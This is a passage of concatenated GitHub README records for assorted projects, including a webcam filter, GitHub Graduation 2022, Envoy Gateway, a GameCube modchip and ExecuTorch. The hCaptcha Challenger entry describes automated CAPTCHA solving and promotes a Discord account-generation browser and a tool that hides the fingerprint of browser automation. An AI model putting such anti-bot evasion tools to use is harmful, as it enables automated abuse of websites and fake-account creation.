Ubuntu install it using sudo apt install python3-venv using $ python3 -m venv venv/ $ source venv/bin/activate Then install the dependencies using: $ pip install -e .[dev,deploy] Setup pre-commit, too: $ pre-commit install TODO [x] Add Virtual webcam documentation for Linux/Gstreamer [x] add webcam selection [ ] Move to opencv-python-headless [ ] add tests License This project is licensed under the MIT License (see the LICENSE file for details).;Take your video conference from within the matrix.;[]
joschuck/matrix-webcam
education/GitHubGraduation-2022;GitHub Graduation-2022 Available Translations 🗣 Arabic Armenian Bangla 中文 Español (España) Español (México) Filipino French German Hindi Indonesian Italian 日本語 Korean Malay Nepali Polski Portuguese (Brazil) मराठी (Marathi) Punjabi Русский Somali ไทย Türkçe Urdu Read the instructions in your language or contribute a translation ! Sep 05, 2022 Re-Print GitHub Graduation card. We are aware that some of you have not received the card yet. We are opening a form for a reprint. We will keep it open until Sep 30. Please only fill out the form if you have not received your card. form May 30, 2022 And that’s a wrap on the GitHub 2022 Yearbook ✨✅ Submissions to the repository are closed as of 12:00pm PT. Yearbook will be live on Wednesday June 8. Check back here for updates! If you believe there has been a mistake with reviews, please let us know in an Issue . All Issues will be responded to before the event on June 11. Don’t forget to save the date and follow us on Twitch for notifications! See you on stage at graduation 👋 This repository contains the yearbook for GitHub Graduation 2022 . By issuing a pull request to this repository, you can request to be added to the GitHub Class of 2022. The first 7,500 pull request successfully merged into the repository by May 27 will receive custom trading card, stickers, and letter in the mail. Privacy Notice 👀 Consider that all the information that you add to this repository will be publicly available. If you don't feel comfortable with displaying your full name, you can include a short name or nickname instead. Who can apply 📝 We invite any student who has graduated, or plans to graduate, in 2022 to apply to the yearbook. This includes bootcamps, code camps, high school graduates, Master's graduates, Ph. D. Graduates, etc. The eligibility criteria are - You have been verified as a student with the GitHub Student Developer Pack. Not yet a part of the Pack? Apply here . You have not participated in a past GitHub Graduation event. You identify as a graduate in the year 2022. How to join the Class of 2022 Here are two steps to join graduation and receive your custom trading card and stickers in the mail. Fill out the shipping form ⚠️ the form needs to be done before creating your Pull Request (PR) and does not guarantee participation in the event. Your PR must successfully merge into the repository and only the first 7,500 merged PRs will receive cards in the mail. Submit a pull request with your profile information to join the Yearbook and be highlighted in the graduation event. 1. Fill out the shipping form. Information submitted to the swag shipment form is only used to ship trading cards for graduation. Submitting the form does not guarantee you will receive anything in the mail. Only the first 7,500 graduates to merge their Pull Request to the GitHub Yearbook will receive a shipment. 2. Add yourself to Yearbook 🏫 Replace <YOUR-USERNAME> with your GitHub username in this guide. Please note that the <YOUR-USERNAME> here is Case Sensitive . For Example, if your username is MonaTheOctocat , using anything other than it like monatheoctocat or monaTheoctocat will throw an error while submitting the Pull Request, make sure you're using the exact same case as your username in both the folder name and file name. First, create the folder _data/YOUR-USERNAME/ Fork this repository, create a new folder inside the _data folder, and name it with your username. It should look something like this _data/<YOUR-USERNAME>/ . Ex. _data/MonaTheOctocat/ Second, add your profile information Create a markdown file in your folder following the convention <YOUR-USERNAME>.md . Ex. _data/MonaTheOctocat/MonaTheOctocat.md Copy the next template into your file, delete the boilerplate data and fill the information with yours. ``` name: FULLNAME-OR-NICKNAME # No longer than 28 characters institution: INSTITUTION-NAME 🚩 # no longer than 58 characters quote: YOUR-SENIOR-QUOTE # no longer than 100 characters, avoid using quotes(") to guarantee the format remains the same. github_user: YOUR-GITHUB-USERNAME ``` Do not use special characters in the template above. Third, submit your Pull Request Go through the checklist on the pull request template to guarantee your submission is valid. The GitHub Education team will review your application, approve and merge your submission if everything is correct. Otherwise, you will get notified of the changes requested in the pull request comment section. Having trouble submitting your Pull Request? Ask for help in the GitHub Community ! Graduation Stories 2022 👩‍🏫👨‍🏫 (optional) Looking for more ways to participate in GitHub Graduation and the possibility of being featured on our social account? We want to hear about the amazing things you achieved during your academic year and how GitHub helped you to accomplish your goals. Take a moment to record a video or write a message and share your story with us, your teachers, and your classmates. How to participate We are looking forward to hearing what you have to say, and we are grateful to have you as part of our community 💖 Remember: you have until May 30th to submit your story! A note on swag 🛍 The first 7,500 successfully merged PRs will receive a custom holographic developer trading card with their GitHub status in the mail. What does this mean? We will use your public GitHub profile information to create a trading card. To ensure your trading card best reflects you, please make sure your GitHub profile picture and bio are up to date and what you would like shown on the card. Graduation Day 🎓 Don't forget to watch the livestream! 📆 Saturday, June 11, 2022 ⏰ 9:00am PT | 16:00 GMT | 21:30 IST 📍 Follow the GitHub Education Twitch Channel for notifications. 📎Add the event to your calender: Google Calendar Outlook Calendar Yahoo Calendar Questions about GitHub Graduation? Ask in the GitHub Community Discussions .;Join the GitHub Graduation Yearbook and "walk the stage" on June 11.;[]
education/GitHubGraduation-2022
QIN2DIM/hcaptcha-challenger;hCaptcha Challenger 🚀 Gracefully face hCaptcha challenge with MoE(ONNX) embedded solution. Introduction Does not rely on any Tampermonkey script. Does not use any third-party anti-captcha services. Just implement some interfaces to make AI vs AI possible. What's features | Challenge Type | Pluggable Resource | | --------------------------------------- | ------------------------------------------------------------ | | image_label_binary | ResNet ONNX classification #challenge | | image_label_area_select: point | YOLOv8 ONNX detection #588 | | image_label_area_select: bounding box | YOLOv8 ONNX segmentation #592 | | image_label_multiple_choice | ViT ONNX zero-shot motion #917 | | Advanced Task | Pluggable Resource | | --------------------------- | ------------------------------------------------------------ | | Rank.Strategy | #nested-model-zoo | | self-supervised challenge | #CLIP-ViT | Workflow | Tasks | Resource | | ----------------------------- | ------------------------------------------------------------ | | ci: sentinel | | | ci: collector | | | datasets: VCS, annoate | #roboflow , #model-factory | | model: ResNet - train / val | | | model: YOLOv8 - train / val | | | model: upload, upgrade | #objects , #modelhub | | datasets: public, archive | #roboflow-universe , #captcha-datasets | Contributors I would like to express my sincere gratitude to all the contributors. What's next Dislock , the most advanced Discord Browser Generator. Powered by hCaptcha Solving AI. undetected-playwright , stash the fingerprint of playwright-based web agents. epic-awesome-gamer , gracefully claim weekly free games from Epic Store. Reference microsoft/playwright-python ultrafunkamsterdam/undetected-chromedriver hCaptcha challenge template site @maximedrn;🥂 Gracefully face hCaptcha challenge with MoE(ONNX) embedded solution.;yolov5,hcaptcha,opencv-python,onnx-models,hcaptcha-solver,solver,onnx,yolo,onnxruntime,playwright
QIN2DIM/hcaptcha-challenger
envoyproxy/gateway;Envoy Gateway Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Gateway API resources are used to dynamically provision and configure the managed Envoy Proxies. Documentation Blog introducing Envoy Gateway. Goals Quickstart to use Envoy Gateway in a few simple steps. Roadmap Contact Slack: Join the Envoy Slack workspace if you're not already a member. Otherwise, use the Envoy Gateway channel to start collaborating with the community. Contributing Code of conduct Contributing guide Developer guide Community Meeting The Envoy Gateway team meets every Tuesday and Thursday. We also have a separate meeting to be held in the Chinese timezone every two weeks to better accommodate our Chinese community members who face scheduling difficulties for the weekly meetings. Please refer to the meeting details for additional information. Meeting details;Manages Envoy Proxy as a Standalone or Kubernetes-based Application Gateway;envoy,kubernetes,gateway-api,cncf,go-control-plane,api-gateway,hacktoberfest
envoyproxy/gateway
lazaronixon/authentication-zero;Authentication Zero The purpose of authentication zero is to generate a pre-built authentication system into a rails application (web or api-only) that follows both security and rails best practices. By generating code into the user's application instead of using a library, the user has complete freedom to modify the authentication system so it works best with their app. Installation $ bundle add authentication-zero If you are using Rails < 7.1, you must use version 2. $ bundle add authentication-zero --version "~> 2" Usage $ rails generate authentication Developer responsibilities Since Authentication Zero generates this code into your application instead of building these modules into the gem itself, you now have complete freedom to modify the authentication system, so it works best with your use case. The one caveat with using a generated authentication system is it will not be updated after it's been generated. Therefore, as improvements are made to the output of rails generate authentication , it becomes your responsibility to determine if these changes need to be ported into your application. Security-related and other important improvements will be explicitly and clearly marked in the CHANGELOG.md file and upgrade notes. Features Essential Sign up Email and password validations Checks if a password has been found in any data breach (--pwned) Authentication by cookie Authentication by token (--api) Two factor authentication + recovery codes (--two-factor) Two factor authentication using a hardware security key (--webauthn) Verify email using a link with token Ask password before sensitive data changes, aka: sudo (--sudoable) Reset the user password and send reset instructions Reset the user password only from verified emails Lock mechanism to prevent email bombing (--lockable) Rate limiting for your app, 1000 reqs/minute (--ratelimit) Send e-mail confirmation when your email has been changed Manage multiple sessions & devices Activity log (--trackable) Log out More Social login with omni auth (--omniauthable) Passwordless authentication (--passwordless) Send invitations (--invitable) "Sign-in as" button (--masqueradable) Multi-tentant application (--tenantable) Generated code has_secure_password : Adds methods to set and authenticate against a bcrypt password. authenticate_by : Given a set of attributes, finds a record using the non-password attributes, and then authenticates that record using the password attributes. generates_token_for : Defines the behavior of tokens generated for a specific purpose. signed cookies : Returns a jar that'll automatically generate a signed representation of cookie value and verify it when reading from the cookie again. httponly cookies : A cookie with the httponly attribute is inaccessible to the JavaScript, this precaution helps mitigate cross-site scripting (XSS) attacks. signed_id : Returns a signed id that is tamper proof, so it's safe to send in an email or otherwise share with the outside world. current attributes : Abstract super class that provides a thread-isolated attributes singleton, which resets automatically before and after each request. action mailer : Action Mailer allows you to send email from your application using a mailer model and views. log filtering : Parameters 'token' and 'password' are marked [FILTERED] in the log. functional tests : In Rails, testing the various actions of a controller is a form of writing functional tests. system testing : System tests allow you to test user interactions with your application, running tests in either a real or a headless browser. Sudoable Use before_action :require_sudo in controllers with sensitive information, it will ask for your password on the first access or after 30 minutes. Tenantable Some artifacts are generated in the application, which makes it possible to implement row-level multitenancy applications. The Current.account is set using the current user account. You should follow some steps to make it work: Add account_id to each scoped table. ex: rails g migration add_account_to_projects account:references . Add include AccountScoped to scoped models. It set up the account relationship and default scope using the current account. Set Current.account through the URL. http://myapp.com/:account_id . (optional) Add require_relative "../lib/account_middleware" to config/application.rb . Add config.middleware.use AccountMiddleware to your application class. More customization is required... Development To release a new version, update the version number in version.rb , and then run bundle exec rake release , which will create a git tag for the version, push git commits and tags, and push the .gem file to rubygems.org . Contributing Bug reports and pull requests are welcome on GitHub at https://github.com/lazaronixon/authentication-zero. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the code of conduct . License The gem is available as open source under the terms of the MIT License . Code of Conduct Everyone interacting in the AuthenticationZero project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct .;An authentication system generator for Rails applications. ;rails,ruby,authentication,generator,rails-authentication,api,auth,security,token
lazaronixon/authentication-zero
pliang279/awesome-phd-advice;Collection of advice for prospective and current PhD students By Paul Liang (pliang@cs.cmu.edu), Machine Learning Department and Language Technologies Institute , CMU , with help from many friends at CMU. If there are any links I missed, please let me know! Credit goes out to the original authors of each link. Table of Contents Other similar collections Advice for prospective students General advice Statement of purpose Visit days, choosing advisor and school Advice for current students PhD survival guides Research Reading Writing Blogposts Reviewing Presenting Advising students Teaching Fellowship applications Networking Organizing workshops and tutorials Attending academic conferences Job search Memoirs Other similar collections Grad School Advice by Jason Hong Advice for Research Students by Jason Eisner Advice for researchers and students by Michael Ernst Advice Collection by Tao Xie and Yuan Xie Awesome CS PhD application advice by Jed Yang CS PhD the greatest hits by Angela Jiang List of PhD reflections by Stephen Tu Thread of PhD application resources by Chaitanya Joshi Useful computer vision PhD resources by Yana Hasson Checklists for Stat-ML PhD students by Aaditya Ramdas Grad School Resources by Kalpesh Krishna AI Research Experiences by Pranav Rajpurkar Advice for prospective students General advice Applying to PhD Programs in Computer Science by Mor Harchol-Balter Graduate School Advice by Stanford CS Undergrad to PhD, or not - advice for undergrads interested in research by John Hewitt HOWTO: Get into grad school for science, engineering, math and computer science by Matt Might Applying for a PhD in NLP by Zhijing Jin and ACL Year-Round Mentorship Session Student Perspectives on Applying to NLP PhD Programs by Akari Asai, John Hewitt, Sidd Karamcheti, Kalpesh Krishna, Nelson Liu, Roma Patel, and Nicholas Tomlin Machine Learning PhD Applications — Everything You Need to Know by Tim Dettmers Demystifying ML PhD Admissions to US Universities by Hima Lakkaraju Demystifying PhD Admissions in Computer Science in the US: a Guide for Vietnamese and International Students by ThanhVu Nguyen A long, rambling, mostly personal corpus of advice on applying to Computer Science grad school (for UWCSE students) by Justine Sherry Ph.D. Applications: FAQ by Noah Smith Quora answer on the admission committee process by Scott Fahlman Reflecting on CS Graduate Admissions by David Anderson A PhD is Not Enough: A Guide to Survival in Science by Peter Feibelman The PhD in CS: Getting There and Being Successful by Michael Hilton, Janet Davis, and Ian Ludden Statement of purpose Database of Example PhD SOPs by the CS-SOP initiative Some Suggestions on writing your statement of purpose by Jennifer Mankoff Graduate School Personal Statements by Christopher Fletcher Inside PhD admissions: What readers look for in a Statement of Purpose by Nathan Schneider How to Write a Bad Statement by Andy Pavlo Tips and Tricks, How-To Guide for Grad School SoPs by Erica Weng Graduate School Statement of Purpose by MIT EECS How to write personal statement for graduate school application by Stanley Chan Writing a Google AI Residency Cover Letter by Katherine Lee and Ben Eysenbach Public examples: [Cody Coleman] , [Sai Rallabandi] , [Jeremy Lacomis] , [Sean Kross] , [Zahid Hossain] , [Jean Yang] Visit days, choosing advisor and school Questions to Ask a Prospective Ph.D. Advisor on Visit Day, With Thorough and Forthright Explanations by Andrew Kuznetsov How to Choose Your Grad School by Tim Dettmers How to Pick a Graduate Advisor by Ben Barres The Definitive ‘what do I ask/look for’ in a PhD Advisor Guide by Columbia CS Advice for current students PhD survival guides So long, and thanks for the PhD by Ronald T. Azuma Graduate School: Keys To Success by Remzi Arpaci-Dusseau The illustrated guide to a PhD by Matt Might How to Be a Successful PhD Student by Mark Dredze, Hanna Wallach Time Management by Randy Pausch Advice to a Beginning Graduate Student by Manuel Blum Finances for CS PhD students by David Anderson A Survival Guide to a PhD by Andrej Karpathy 15 pieces of advice I wish my PhD advisor had given me by Jim Kurose The Tao of PhD: Thriving in the Allen School’s Graduate Program by University of Washington 10 tips for PhD students by Daniela Witten Expectation Setting by Eugene Vinitsky Research How to Do Great Research by Nick Feamster and Alex Gray How to Have a Bad Career How to Have a Bad Career in Research/Academia by David Patterson Useful Thoughts about Research by H.T. Kung You and Your Research by Richard Hamming Advice on Research and Writing by Mark Leone Reading How to Read a Paper by Srinivasan Keshav How to Read a Technical Paper by Jason Eisner Writing How to write a good CVPR submission by Bill Freeman Ten Simple Rules for Mathematical Writing by Dimitri Bertsekas Notes on writing by Fredo Durand How to write a (hopefully good) paper by Martin Vetterli Blogposts PhDLife Blog - A collection of blog posts from Warwick University Reviewing Reviewer Tutorial by CVPR 2022 How to write a good review by CVPR 2020 How to write a reviewer report by Stanley Chan Presenting Giving an Academic Talk by Jonathan Shewchuk How to give a technical presentation by Michael Ernst Advising students (coming soon, send PR!) Teaching How to Be a Teaching Assistant by Jason Eisner Fellowship applications Tips for the NSF GRFP Application by Danielle Perry NSF GRFP Advice by Christine Liu NSF Fellowship by Alex Lang Tips by Tara Safavi Public examples: [Extensive NSF collection by Alex Lang] , [Victoria Dean (NSF personal)] , [Victoria Dean (NSF research)] , [Tara Safavi (NSF)] , [Paul Liang (Facebook)] , [Devendra Chaplot (Facebook)] , [Sai Rallabandi (Facebook)] Networking Networking on the Network: A Guide to Professional Skills for PhD Students by Phil Agre Organizing workshops and tutorials Hitchhiker’s guide to organizing an academic workshop by Ben Eysenbach and Surya Bhupatiraju Attending academic conferences Nine things I wish I had known the first time I came to NeurIPS by Jennifer Vaughan NeurIPS 2018 through the eyes of first-timers by Fangyu Cai How To Make A Plan To Attend International Academic Conferences Job search Tips for Computer Science Faculty Applications How to Ask for a Letter of Recommendation Interview Questions for Computer Science Faculty Jobs The Ph.D. Job Hunt - Helping Students Find the Right Positions by Ed Lazowska The N Things I wish I Knew Before the Job Search, by Maria Ebling, Guerney Hunt, Lily Mummert, Bill Tetzlaff, and John Davis The academic job search for computer scientists in 10 questions by Nicolas Papernot and Elissa Redmiles Checklist for faculty job-hunting in Stat/ML by Aaditya Ramdas Tips on the interview process by Jeannette Wing Getting an academic job by Michael Ernst Computer science graduate job and interview guide by Wes Weimer, Claire Le Goues, Zak Fry, Kevin Leach, Yu Huang, and Kevin Angstadt Academic job search advice by Matt Might Memoirs I loved graduate school by Peter Bailis What my PhD was like by Jean Yang How to get a Ph.D. in computer science if you're me by Chris Martens The N=1 guide to grad school by Adam Marcus;Collection of advice for prospective and current PhD students;phd-students,phd-application,research,computer-science,machine-learning
pliang279/awesome-phd-advice
Janspiry/Palette-Image-to-Image-Diffusion-Models;Palette: Image-to-Image Diffusion Models Paper | Project Brief This is an unofficial implementation of Palette: Image-to-Image Diffusion Models by Pytorch , and it is mainly inherited from its super-resolution version Image-Super-Resolution-via-Iterative-Refinement . The code template is from my another seed project: distributed-pytorch-template . There are some implementation details with paper descriptions: We adapted the U-Net architecture used in Guided-Diffusion , which give a substantial boost to sample quality. We used the attention mechanism in low-resolution features (16×16) like vanilla DDPM . We encode the $\gamma$ rather than $t$ in Palette and embed it with affine transformation. We fix the variance $Σ_\theta(x_t, t)$ to a constant during the inference as described in Palette . Status Code [x] Diffusion Model Pipeline [x] Train/Test Process [x] Save/Load Training State [x] Logger/Tensorboard [x] Multiple GPU Training (DDP) [x] EMA [x] Metrics (now for FID, IS) [x] Dataset (now for inpainting, uncropping, colorization) [x] Google colab script 🌟(now for inpainting) Task I try to finish following tasks in order: - [x] Inpainting on CelebaHQ 🚀 ( Google Colab ) - [x] Inpainting on Places2 with 128×128 centering mask 🚀 The follow-up experiment is uncertain, due to lack of time and GPU resources: [ ] Uncropping on Places2 [ ] Colorization on ImageNet val set Results The DDPM model requires significant computational resources, and we have only built a few example models to validate the ideas in this paper. Visuals Celeba-HQ Results with 200 epochs and 930K iterations, and the first 100 samples in centering mask and irregular mask . | | | | ------------------------------------------------ | ---- | Places2 with 128×128 centering mask Results with 16 epochs and 660K iterations, and the several picked samples in centering mask . | | | | | | ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | ---- | | | | | | Uncropping on Places2 Results with 8 epochs and 330K iterations, and the several picked samples in uncropping . | | | | ------------------------------------------------ | ---- | Metrics | Tasks | Dataset | EMA | FID(-) | IS(+) | | -------------------- | ----------- | -------- | ---- | -------------------- | | Inpainting with centering mask | Celeba-HQ | False | 5.7873 | 3.0705 | | Inpainting with irregular mask | Celeba-HQ | False | 5.4026 | 3.1221 | Usage Environment python pip install -r requirements.txt Pre-trained Model | Dataset | Task | Iterations | GPUs×Days×Bs | URL | | --------- | ---------- | ---------- | ------------ | ------------------------------------------------------------ | | Celeba-HQ | Inpainting | 930K | 2×5×3 | Google Drive | | Places2 | Inpainting | 660K | 4×8×10 | Google Drive | Bs indicates sample size per gpu. Data Prepare We get most of them from Kaggle, which may be slightly different from official version, and you also can download them from official website. - CelebA-HQ resized (256x256) Kaggle - Places2 Official | Places2 Kaggle - ImageNet Official We use the default division of these datasets for training and evaluation. The file lists we use can be found in Celeba-HQ , Places2 . After you prepared own data, you need to modify the corresponding configure file to point to your data. Take the following as an example: yaml "which_dataset": { // import designated dataset using arguments "name": ["data.dataset", "InpaintDataset"], // import Dataset() class "args":{ // arguments to initialize dataset "data_root": "your data path", "data_len": -1, "mask_mode": "hybrid" } }, More choices about dataloader and validation split also can be found in datasets part of configure file. Training/Resume Training Download the checkpoints from given links. Set resume_state of configure file to the directory of previous checkpoint. Take the following as an example, this directory contains training states and saved model: yaml "path": { //set every part file path "resume_state": "experiments/inpainting_celebahq_220426_150122/checkpoint/100" }, 2. Set your network label in load_everything function of model.py , default is Network . Follow the tutorial settings, the optimizers and models will be loaded from 100.state and 100_Network.pth respectively. python netG_label = self.netG.__class__.__name__ self.load_network(network=self.netG, network_label=netG_label, strict=False) Run the script: python python run.py -p train -c config/inpainting_celebahq.json We test the U-Net backbone used in SR3 and Guided Diffusion , and Guided Diffusion one have a more robust performance in our current experiments. More choices about backbone , loss and metric can be found in which_networks part of configure file. Test Modify the configure file to point to your data following the steps in Data Prepare part. Set your model path following the steps in Resume Training part. Run the script: python python run.py -p test -c config/inpainting_celebahq.json Evaluation Create two folders saving ground truth images and sample images, and their file names need to correspond to each other. Run the script: python python eval.py -s [ground image path] -d [sample image path] Acknowledge Our work is based on the following theoretical works: - Denoising Diffusion Probabilistic Models - Palette: Image-to-Image Diffusion Models - Diffusion Models Beat GANs on Image Synthesis and we are benefiting a lot from the following projects: - openai/guided-diffusion - LouisRouss/Diffusion-Based-Model-for-Colorization;Unofficial implementation of Palette: Image-to-Image Diffusion Models by Pytorch;ddpm,image-restoration,ddp,implementation,pytorch,diffusion-model
Janspiry/Palette-Image-to-Image-Diffusion-Models
h4h13/Paisa;Paisa - Expense Tracker Material design expense manager ⚠ Join Telegram Group for important updates Screen shots Mobile | | | | | | :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: | :--------------------------------------------------: | | Home | Accounts | Categories | Budget overview | Foldable | | | | | | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | | Home | Accounts | Categories | Budget overview | Tablet & Desktop | | | | | | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | :-------------------------------------------------------------: | | Home | Accounts | Categories | Budget overview | Expense Tracking Tracking expenses, incomes & deposits Account & budget visw overview Manage categories Steps to translate Create .arb file inside lib/localization/app_<language_code>.arb example app_en.arb Copy all transactions from app_en.arb to created file and remove all keys which annotates with @ From json { "appTitle": "Paisa", "@appTitle": { "description": "The app name", "type": "text", "placeholders": {} } } To json { "appTitle": "Paisa" } Check untranslated.json for anything missing keys need to be translated Run the app and check once Steps to build project Clone the Flutter Project: Use git clone https://github.com/RetroMusicPlayer/Paisa.git to download the project from the GitHub repository. Install Dependencies: Navigate to the project directory and run flutter pub get to install the required dependencies. Run the App: Connect a device or emulator and run the app using flutter run --flavor dev or through your IDE. Download License Copyright (c) 2022, Hemanth Savarala All rights reserved. This source code is licensed under the GPLv3-style license found in the LICENSE file in the root directory of this source tree.;Expense manager for Android with Material Design;android,blocstatemanagement,clean-architecture,windows,bloc,dart,flutter,injectable,material-design,material-ui
h4h13/Paisa
webhdx/PicoBoot;PicoBoot This is a long awaited IPL replacement modchip for Nintendo GameCube. It's open source, cheap and easy to install. Join Discord Server to get support and discuss new features: Features it's open source uses $4 Raspberry Pi Pico board very easy installation, only 5 wires to solder programmable via USB cable, without any drivers and programs automatically boots any DOL app of your choice uses "IPL injection" approach superior to mods like XenoGC Video guides and features overview PicoBoot Modchip Will Unleash The POWER of Your Nintendo GAMECUBE! | Installation Guide and Overview by MachoNachoProductions This new Gamecube Modchip is a GAMECHANGER - PicoBoot by RockerGaming $5 Gamecube IPL Modchip?! Picoboot Dol-001 + Dol-101 Installation / Setup / Showcase by ModzvilleUSA! PicoBoot GameCube custom mod chip - make and install your own chip with a Raspberry Pi Pico by Joe Bleeps Installation guide Head over to support.webhdx.dev for Installation guide and Troubleshooting tips . I appreciate your work. Can I support you in any way? This project is free and available for everyone. If you want to support it anyway, consider using :heart: Sponsor button. Hall of Fame I'd like to thank people who helped making PicoBoot possible: * #gc-forever crew: Extrems , novenary , emu_kidid and others * tmbinc - he started it all 🙏 * happy_bunny - I started my research with his great writeup on Shuriken Attack * beta testers: seewood , MethodOrMadness , renanbianchi * content creators: MachoNachoProductions , RockerGaming , ModzvilleUSA! * people who sponsored this project * every PicoBoot enjoyer - it's all about you after all 😉 Acknowledgements Some parts of this project use GPL-2.0 licensed code from: * https://github.com/redolution/iplboot;Raspberry Pi Pico (RP2040) based IPL replacement modchip for GameCube;gamecube,modchip
webhdx/PicoBoot
pytorch/executorch;ExecuTorch ExecuTorch is an end-to-end solution for enabling on-device inference capabilities across mobile and edge devices including wearables, embedded devices and microcontrollers. It is part of the PyTorch Edge ecosystem and enables efficient deployment of PyTorch models to edge devices. Key value propositions of ExecuTorch are: Portability: Compatibility with a wide variety of computing platforms, from high-end mobile phones to highly constrained embedded systems and microcontrollers. Productivity: Enabling developers to use the same toolchains and SDK from PyTorch model authoring and conversion, to debugging and deployment to a wide variety of platforms. Performance: Providing end users with a seamless and high-performance experience due to a lightweight runtime and utilizing full hardware capabilities such as CPUs, NPUs, and DSPs. For a comprehensive technical overview of ExecuTorch and step-by-step tutorials, please visit our documentation website for the latest release (or the main branch ). Feedback We welcome any feedback, suggestions, and bug reports from the community to help us improve our technology. Please use the PyTorch Forums for discussion and feedback about ExecuTorch using the ExecuTorch category, and our GitHub repository for bug reporting. We recommend using the latest release tag from the Releases page when developing. Directory Structure executorch ├── backends # Backend delegate implementations. ├── build # Utilities for managing the build system. ├── codegen # Tooling to autogenerate bindings between kernels and the runtime. ├── configurations ├── docs # Static docs tooling. ├── examples # Examples of various user flows, such as model export, delegates, and runtime execution. ├── exir # Ahead-of-time library: model capture and lowering APIs. | ├── _serialize # Serialize final export artifact. | ├── backend # Backend delegate ahead of time APIs | ├── capture # Program capture. | ├── dialects # Op sets for various dialects in the export process. | ├── emit # Conversion from ExportedProgram to ExecuTorch execution instructions. | ├── operator # Operator node manipulation utilities. | ├── passes # Built-in compiler passes. | ├── program # Export artifacts. | ├── serde # Graph module serialization/deserialization. | ├── verification # IR verification. ├── extension # Extensions built on top of the runtime. | ├── android # ExecuTorch wrappers for Android apps. | ├── apple # ExecuTorch wrappers for iOS apps. | ├── aten_util # Converts to and from PyTorch ATen types. | ├── data_loader # 1st party data loader implementations. | ├── evalue_util # Helpers for working with EValue objects. | ├── gguf_util # Tools to convert from the GGUF format. | ├── kernel_util # Helpers for registering kernels. | ├── memory_allocator # 1st party memory allocator implementations. | ├── module # A simplified C++ wrapper for the runtime. | ├── parallel # C++ threadpool integration. | ├── pybindings # Python API for executorch runtime. | ├── pytree # C++ and Python flattening and unflattening lib for pytrees. | ├── runner_util # Helpers for writing C++ PTE-execution tools. | ├── testing_util # Helpers for writing C++ tests. | ├── training # Experimental libraries for on-device training ├── kernels # 1st party kernel implementations. | ├── aten | ├── optimized | ├── portable # Reference implementations of ATen operators. | ├── prim_ops # Special ops used in executorch runtime for control flow and symbolic primitives. | ├── quantized ├── profiler # Utilities for profiling runtime execution. ├── runtime # Core C++ runtime. | ├── backend # Backend delegate runtime APIs. | ├── core # Core structures used across all levels of the runtime. | ├── executor # Model loading, initalization, and execution. | ├── kernel # Kernel registration and management. | ├── platform # Layer between architecture specific code and portable C++. ├── schema # ExecuTorch PTE file format flatbuffer schemas. ├── scripts # Utility scripts for size management, dependency management, etc. ├── sdk # Model profiling, debugging, and introspection. ├── shim # Compatibility layer between OSS and Internal builds ├── test # Broad scoped end-to-end tests. ├── third-party # Third-party dependencies. ├── util # Various helpers and scripts. License ExecuTorch is BSD licensed, as found in the LICENSE file.;On-device AI across mobile, embedded and edge for PyTorch;deep-learning,embedded,machine-learning,mobile,neural-network,tensor,gpu
pytorch/executorch
themeselection/materio-mui-nextjs-admin-template-free;Materio - Free MUI NextJS Admin Template Most Powerful & Comprehensive Free MUI NextJS Admin Dashboard Template built for developers! Introduction 🚀 If you're a developer looking for the most Powerful & comprehensive Free MUI NextJS Admin Dashboard Template built for developers, rich with features, and highly customizable, look no further than Materio. We've followed the highest industry standards to bring you the very best admin template that is not only easy to use but highly scalable. Offering ultimate convenience and flexibility, you'll be able to build whatever application you want with very little hassle. Build premium quality applications with ease. Use one of the most innovative NextJS admin templates to create eye-catching, high-quality WebApps. Your apps will be completely responsive, ensuring they'll look stunning and function flawlessly on desktops, tablets, and mobile devices. Materio provides a template with TypeScript and JavaScript. View Demo Features 📋 ⚡ Next.js with App Router support 💎 Integrated with MUI & Tailwind CSS ✅ TypeScript & JavaScript Support 📏 Linter with ESLint 💖 Code Formatter with Prettier 🗂 VSCode configuration: Settings, Extensions and Custom Snippets 💡 Absolute Imports with aliases ☕ Minify HTML & CSS 💨 Live reload ✅ Cache busting 🛠️ Easy to customize 😎 SEO-friendly 🚀 Production-ready Requirements ✅ Node.js LTS version (not current version) npm Installation ⚒️ Installing and running the template is super easy in Materio, please follow these steps and you should be ready to rock 🤘: Make sure you have installed Node.js (LTS). If Node.js is already installed in your system, make sure the installed version is LTS (and not the latest version) Navigate to the typescript-version or javascript-version folder and run the following command to install our local dependencies listed in the package.json file. You can use pnpm , yarn or npm as per your preference It is recommended to use pnpm for better dependency management ```bash # For pnpm (recommended) pnpm install # For yarn yarn install # For npm npm install ``` Rename the .env.example file to .env file Now, you are ready to start the server with the help of the command shown below. Open http://localhost:3000 to check your development 🚀. ```bash # For pnpm (recommended) pnpm dev # For yarn yarn dev # For npm npm run dev ``` What's Included 📦 Layouts Blank Full Boxed Dashboard Pages Account Settings Login Register Forgot Password Error Under Maintenance Iconify Icons Basic Cards Form Layouts What's in Premium Version 💎 | Materio Free Version | Materio Premium Version | | ----------------------------------------------- | :------------------------------------------------ | | Demo | Demo | | Download | Purchase | | Single vertical menu | Vertical (+ vertical collapsed) & Horizontal menu | | Default skin | Default, bordered & semi-dark skin | | 1 simple dashboard | 5 niche dashboards | | - | 10 Applications including eCommerce, academy, email, chat, calendar, invoice, kanban, etc. | | Simple form layouts | Advanced form layouts, form validation & form wizard | | Basic cards | Basic, advanced, statistics, charts, gamification & action cards | | - | Quick search - quickly navigate between pages (with hotkey support) | | Basic tables | Advanced tables | | 1 chart library | 2 chart libraries | | 6 pages | 35+ pages | | Simple navbar & footer | Multiple navbar & footer options | | - | Authentication using NextAuth | | - | RTL (right-to-left) support | | - | Redux toolkit | | - | Multi-lingual support | | - | Starter-kit | | - | Customizer drawer to check options in live app | | Limited customization | Endless customization possibilities | | Regular support | Priority support | Documentation 📜 Check out our live Documentation Deployment 🚀 Check out our Deployment docs Browser Support 🖥️ * It also supports other browser which implemented latest CSS standards Contributing 🦸 Contribution are always welcome and recommended! Here is how: Fork the repository ( here is the guide ). Clone to your machine git clone https://github.com/YOUR_USERNAME/REPO_NAME Make your changes Create a pull request Contribution Requirements 🧰 When you contribute, you agree to give a non-exclusive license to ThemeSelection to use that contribution in any context as we (ThemeSelection) see 